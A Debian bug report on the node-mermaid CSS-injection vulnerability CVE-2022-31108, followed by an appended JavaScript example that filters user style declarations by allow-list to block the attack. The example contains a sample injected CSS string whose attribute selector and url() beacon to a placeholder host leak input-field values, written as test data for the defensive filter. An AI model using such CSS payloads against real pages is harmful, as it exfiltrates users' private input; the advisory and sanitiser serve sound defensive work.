[Pkg-javascript-devel] Bug#1014540: node-mermaid: CVE-2022-31108
Moritz Mühlenhoff
jmm at inutil.org
Thu Jul 7 16:57:07 BST 2022
Source: node-mermaid
X-Debbugs-CC: team at security.debian.org
Severity: important
Tags: security

Hi,

The following vulnerability was published for node-mermaid.

CVE-2022-31108[0]:
| Mermaid is a JavaScript based diagramming and charting tool that uses
| Markdown-inspired text definitions and a renderer to create and modify
| complex diagrams. An attacker is able to inject arbitrary `CSS` into
| the generated graph allowing them to change the styling of elements
| outside of the generated graph, and potentially exfiltrate sensitive
| information by using specially crafted `CSS` selectors. The following
| example shows how an attacker can exfiltrate the contents of an input
| field by bruteforcing the `value` attribute one character at a time.
| Whenever there is an actual match, an `http` request will be made by
| the browser in order to "load" a background image that will let an
| attacker know what's the value of the character. This issue may lead
| to `Information Disclosure` via CSS selectors and functions able to
| generate HTTP requests. This also allows an attacker to change the
| document in ways which may lead a user to perform unintended actions,
| such as clicking on a link, etc. This issue has been resolved in
| version 9.1.3. Users are advised to upgrade. Users unable to upgrade
| should ensure that user input is adequately escaped before embedding
| it in CSS blocks.

https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf
https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2022-31108
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108

Please adjust the affected versions in the BTS as needed.
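The advisory's last sentence (escape user input before embedding it in CSS blocks) in working form, as an added example that is not part of this bug report and is not mermaid's own fix from the linked commit. It assumes, for illustration, that user-supplied node styling arrives as comma-separated `prop:value` pairs and that only a small allow-list of properties with simple values is needed; the selector is generated by the code, never taken from the user, and any value containing characters that could close a declaration block or start a new rule or `url()` call is dropped. The `#diagram` selector, the property allow-list and the `.node-<id>` class naming are assumptions of this example.

```javascript
// Added example: allow-list filtering of user-controlled style declarations
// before they are interpolated into a generated <style> block. Not the mermaid
// project's code; property names, selector scheme and limits are assumptions.

// Properties a diagram author may legitimately set (assumed list).
const ALLOWED_PROPERTIES = new Set([
  "fill", "stroke", "stroke-width", "color", "font-size", "opacity",
]);

// A value may only contain characters that cannot terminate the declaration
// block or open a new selector / function: no { } ; ( ) [ ] \ " ' < > / and
// no comma, which is reserved as the declaration separator in this format.
const SAFE_VALUE = /^[A-Za-z0-9#.%\s-]{1,64}$/;

// Node ids end up inside a selector, so they are restricted to identifier
// characters rather than escaped.
const SAFE_ID = /^[A-Za-z0-9_-]{1,64}$/;

// Split "fill:#f9f,stroke:#333" into declarations, keep only those whose
// property is allow-listed and whose value matches SAFE_VALUE, and report the
// rest so callers can log rejected input (useful as an injection signal).
function sanitizeDeclarations(userStyle) {
  const kept = [];
  const rejected = [];
  for (const raw of String(userStyle).split(",")) {
    const decl = raw.trim();
    if (decl === "") continue;
    const idx = decl.indexOf(":");
    if (idx < 0) {
      rejected.push(decl);
      continue;
    }
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    if (ALLOWED_PROPERTIES.has(prop) && SAFE_VALUE.test(value)) {
      kept.push(`${prop}:${value}`);
    } else {
      rejected.push(decl);
    }
  }
  return { kept, rejected };
}

// Build the CSS rule for one node. The selector is scoped to the diagram
// container (assumed id "diagram") so even a valid rule cannot style elements
// outside the rendered graph.
function buildNodeRule(nodeId, userStyle) {
  if (!SAFE_ID.test(nodeId)) {
    throw new Error(`unsafe node id: ${JSON.stringify(nodeId)}`);
  }
  const { kept } = sanitizeDeclarations(userStyle);
  return `#diagram .node-${nodeId} { ${kept.join("; ")} }`;
}

// Constructed sample input in the shape the advisory describes: the first
// "value" tries to close the block and add an attribute selector with a
// background-image beacon. The filter drops it and keeps the benign part.
const SAMPLE_INJECTION =
  'fill:#f00} input[value^="a"] {background:url(//example.invalid/a),stroke:#333';

function demo() {
  const benign = buildNodeRule("A", "fill:#f9f,stroke:#333,stroke-width:4px");
  const filtered = sanitizeDeclarations(SAMPLE_INJECTION);
  return { benign, filtered };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Logging `rejected` is worth doing in a real deployment: a declaration containing `{`, `[` or `url(` in a field meant for colours and widths is a reliable indicator of the injection attempt the advisory describes.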